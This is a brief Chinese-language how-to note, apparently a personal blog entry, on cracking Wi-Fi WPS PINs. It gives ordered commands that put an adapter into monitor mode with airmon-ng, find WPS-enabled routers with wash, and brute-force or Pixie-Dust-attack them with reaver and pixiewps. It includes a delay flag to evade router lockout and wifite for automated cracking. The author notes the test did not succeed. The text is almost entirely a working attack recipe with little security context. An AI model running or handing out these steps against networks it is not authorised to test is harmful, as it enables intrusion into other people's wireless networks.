无线网络WPS攻击

无线网WPS攻击（测试未成功）

提前准备：

注意：顺序最好不要乱了顺序。

1.service network-manager stop

2. airmon-ng check kill

3.连接外置网卡

4.airmon-ng start wlan0 （把网卡变为监听模式，输入ifconfig可看到wlan0已变成wlan0mon）

正式步骤：

1.利用wash扫描附近开启WPS的网络：wash -i wlan0mon

2.reaver -i wlan0mon -b bssid值 -c 10 -vv -k 1 （-c指定信道，使用-k 1 测试是否有芯片漏洞，若有则10秒之后就能破开WPS密码） 。

3.如果第2步未发现存在芯片漏洞的网络，则删除-k 1，则运行：reaver -i wlan0mon -b bssid值 -c 10 -vv （reaver的-d参数指定延迟时间可以设为10秒，避免被路由锁定机制 ）。

4.如果路由器有响应，也可以利用pixiewps指令来破有漏洞的网络：

命令：输入pixiewps查看提示。

5.如果破得wps密码，则使用：reaver -i wlan0mon -b bssid值 -vv -p 破得的wps值 （也可以加-c 10选择信道）。

6.也可以尝试用wifite来傻瓜式的破解。输入wifite命令查看提示。